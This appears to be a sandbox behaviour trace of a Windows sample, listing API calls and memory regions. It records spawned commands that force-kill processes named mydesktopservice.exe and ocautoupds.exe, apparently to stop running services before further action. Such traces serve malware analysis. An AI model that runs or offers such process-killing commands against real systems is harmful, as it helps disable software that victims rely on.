[0170.293] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0170.293] GetProcessHeap () returned 0x710000 [0170.293] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x717780) returned 1 [0170.293] GetProcessHeap () returned 0x710000 [0170.293] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa) returned 0x71b1b8 [0170.293] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0170.303] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im mydesktopservice.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im mydesktopservice.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im mydesktopservice.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x1180, dwThreadId=0x10a8)) returned 1 [0170.344] CloseHandle (hObject=0x98) returned 1 [0170.346] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0170.346] GetProcessHeap () returned 0x710000 [0170.346] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x719d68) returned 1 [0170.346] GetEnvironmentStringsW () returned 0x719d68* [0170.346] GetProcessHeap () returned 0x710000 [0170.346] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa76) returned 0x717cd8 [0170.346] FreeEnvironmentStringsA (penv="=") returned 1 [0170.346] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0171.833] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0171.834] CloseHandle (hObject=0x9c) returned 1 [0171.835] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0171.835] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0171.836] GetProcessHeap () returned 0x710000 [0171.836] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x717cd8) returned 1 [0171.836] GetEnvironmentStringsW () returned 0x717cd8* [0171.836] GetProcessHeap () returned 0x710000 [0171.836] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa9c) returned 0x71c710 [0171.836] FreeEnvironmentStringsA (penv="=") returned 1 [0171.836] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0171.837] GetProcessHeap () returned 0x710000 [0171.837] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x71c710) returned 1 [0171.837] GetEnvironmentStringsW () returned 0x717cd8* [0171.837] GetProcessHeap () returned 0x710000 [0171.837] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa9c) returned 0x71c710 [0171.838] FreeEnvironmentStringsA (penv="=") returned 1 [0171.838] GetProcessHeap () returned 0x710000 [0171.838] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x71b1b8) returned 1 [0171.838] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0171.838] _get_osfhandle (_FileHandle=1) returned 0x158 [0171.838] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0171.838] _get_osfhandle (_FileHandle=1) returned 0x158 [0171.838] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0171.838] _get_osfhandle (_FileHandle=0) returned 0x154 [0171.838] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0171.838] GetConsoleOutputCP () returned 0x1b5 [0171.840] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0171.840] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.842] exit (_Code=128) Thread: id = 206 os_tid = 0x11e8 Process: id = "33" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x31368000" os_pid = "0x1180" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0xd3c" cmd_line = "taskkill /f /im mydesktopservice.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2660 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2661 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2662 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2663 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2664 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2665 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2666 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2667 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2668 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2669 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2670 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2671 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2672 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2673 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2674 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2675 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2676 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2677 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2678 start_va = 0x41b0000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 2679 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2680 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2681 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2682 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2683 start_va = 0x4400000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2684 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2685 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2686 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2687 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2688 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2689 start_va = 0x4570000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 2690 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2691 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2692 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2693 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 2694 start_va = 0x4170000 end_va = 0x41affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 2695 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2696 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2697 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2698 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2699 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2700 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2701 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2702 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2703 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2704 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2705 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2706 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2707 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2708 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2709 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2710 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2711 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2712 start_va = 0x4670000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 2713 start_va = 0x41c0000 end_va = 0x41e9fff monitored = 0 entry_point = 0x41c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2714 start_va = 0x4670000 end_va = 0x47f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Region: id = 2715 start_va = 0x4850000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 2716 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2717 start_va = 0x4860000 end_va = 0x49e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 2718 start_va = 0x49f0000 end_va = 0x5deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 2719 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2720 start_va = 0x41c0000 end_va = 0x41c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041c0000" filename = "" Region: id = 2721 start_va = 0x41d0000 end_va = 0x41d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2722 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 2723 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 2724 start_va = 0x5df0000 end_va = 0x6126fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2725 start_va = 0x6130000 end_va = 0x6219fff monitored = 0 entry_point = 0x616d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2726 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 2727 start_va = 0x6130000 end_va = 0x620ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2728 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2729 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2730 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2731 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 2732 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2733 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2734 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2735 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2736 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2737 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 2738 start_va = 0x4800000 end_va = 0x483ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2739 start_va = 0x6210000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006210000" filename = "" Region: id = 2740 start_va = 0x6250000 end_va = 0x628ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 2741 start_va = 0x6290000 end_va = 0x62cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006290000" filename = "" Region: id = 2742 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2743 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2744 start_va = 0x4840000 end_va = 0x4845fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Thread: id = 207 os_tid = 0x10a8 Thread: id = 208 os_tid = 0xd24 Thread: id = 209 os_tid = 0xf14 Thread: id = 210 os_tid = 0xf0c Thread: id = 211 os_tid = 0x1338 Process: id = "34" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3118d000" os_pid = "0x134c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im ocautoupds.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2745 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2746 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2747 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2748 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2749 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2750 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2751 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2752 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2753 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2754 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2755 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2756 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2757 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2758 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2759 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2760 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2761 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2762 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2763 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2764 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2765 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2766 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2767 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2768 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2769 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2770 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 